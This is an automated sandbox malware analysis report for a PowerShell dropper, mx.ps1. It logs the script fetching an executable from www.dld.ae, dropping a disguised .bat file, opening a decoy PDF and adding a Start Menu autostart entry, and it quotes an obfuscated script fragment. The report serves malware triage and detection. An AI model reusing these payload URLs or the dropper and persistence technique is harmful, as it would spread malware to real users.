Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mx.ps1

Overview

General Information

Sample Name:mx.ps1
Analysis ID:879707
MD5:c90bd676777bea3ec071b9d7361b2b4b
SHA1:ca737705f466845c0cc801c7841e479c28dd9405
SHA256:2d336ee677f040b0c8138cf4a69b78d4e3ae1f99dbd83327f013df6a1d28fe8a
Tags:ps1www-dld-ae
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Powershell drops PE file
Opens the same file many times (likely Sandbox evasion)
Drops PE files to the user root directory
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Drops PE files to the user directory
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6692 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mx.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • u5p3.bat (PID: 2128 cmdline: "C:\Users\Public\u5p3.bat" MD5: 9DCA43CB15D97693D2DE73683804C5C7)
    • AcroRd32.exe (PID: 7020 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
      • RdrCEF.exe (PID: 2980 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.4:49694 version: TLS 1.0
Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: u5p3.bat, 00000002.00000003.595066561.0000000002870000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr
Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: u5p3.bat, 00000002.00000003.595066561.0000000002870000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr
Source: C:\Users\Public\u5p3.batCode function: 2_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040595A
Source: C:\Users\Public\u5p3.batCode function: 2_2_0040658F FindFirstFileW,FindClose,2_2_0040658F
Source: C:\Users\Public\u5p3.batCode function: 2_2_00402862 FindFirstFileW,2_2_00402862
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global trafficHTTP traffic detected: GET /zp/zpeu.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.4:49694 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: powershell.exe, 00000000.00000002.675724672.000001CFC4EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: u5p3.bat, 00000002.00000000.584676802.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, u5p3.bat, 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, u5p3.bat.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000000.00000002.671927237.000001CFBD060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.671927237.000001CFBCF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.618817974.000001CFACEB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp, mx.ps1String found in binary or memory: http://www.bludgumaxxlasdgur.com/rh/List%20of%20rdguquirdgud%20itdgums%20and%20sdgurvicdgus.pdf
Source: powershell.exe, 00000000.00000002.618817974.000001CFADFE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.618817974.000001CFADFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
Source: powershell.exe, 00000000.00000002.618817974.000001CFADFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
Source: powershell.exe, 00000000.00000002.618817974.000001CFADFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.comx
Source: u5p3.bat, 00000002.00000003.595363835.000000000287C000.00000004.00000020.00020000.00000000.sdmp, bn.txt.2.drString found in binary or memory: http://www.oruddho.com
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.618817974.000001CFAE98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.675724672.000001CFC4F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000000.00000002.671927237.000001CFBD060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.671927237.000001CFBCF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD8B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dld.ae
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD8B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dld.ae/zp/zpeu.exe
Source: unknownDNS traffic detected: queries for: www.dld.ae
Source: global trafficHTTP traffic detected: GET /zp/zpeu.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
Source: u5p3.bat, 00000002.00000002.840853027.000000000070A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\Public\u5p3.batCode function: 2_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004053EF

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\u5p3.batJump to dropped file
Source: C:\Users\Public\u5p3.batCode function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040333D
Source: C:\Users\Public\u5p3.batCode function: 2_2_004069562_2_00406956
Source: C:\Users\Public\u5p3.batCode function: 2_2_00404C2C2_2_00404C2C
Source: C:\Users\Public\u5p3.batProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mx.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\u5p3.bat "C:\Users\Public\u5p3.bat"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\u5p3.bat "C:\Users\Public\u5p3.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdfJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\Public\u5p3.batKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\Public\u5p3.batCode function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040333D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\u5p3.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pn21suu.a4h.ps1Jump to behavior
Source: classification engineClassification label: mal56.evad.winPS1@13/64@3/3
Source: C:\Users\Public\u5p3.batCode function: 2_2_004020FE CoCreateInstance,2_2_004020FE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\Public\u5p3.batCode function: 2_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_004046B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: u5p3.bat, 00000002.00000003.595066561.0000000002870000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr
Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: u5p3.bat, 00000002.00000003.595066561.0000000002870000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr
Source: C:\Users\Public\u5p3.batCode function: 2_2_10002DE0 push eax; ret 2_2_10002E0E
Source: C:\Users\Public\u5p3.batCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\u5p3.batJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\u5p3.batJump to dropped file
Source: C:\Users\Public\u5p3.batFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dllJump to dropped file
Source: C:\Users\Public\u5p3.batFile created: C:\Users\user\AppData\Local\Temp\nsn12E4.tmp\System.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\u5p3.batJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\u5p3.batJump to dropped file
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of required items and services.pdf') -oulv 'http://www.bludgumaxxlasdgur.com/rh/List%20of%20rdguquirdgud%20itdgums%20and%20sdgurvicdgus.pdf';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powers
Source: C:\Users\Public\u5p3.batFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\LangustJump to behavior
Source: C:\Users\Public\u5p3.batFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\GradeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
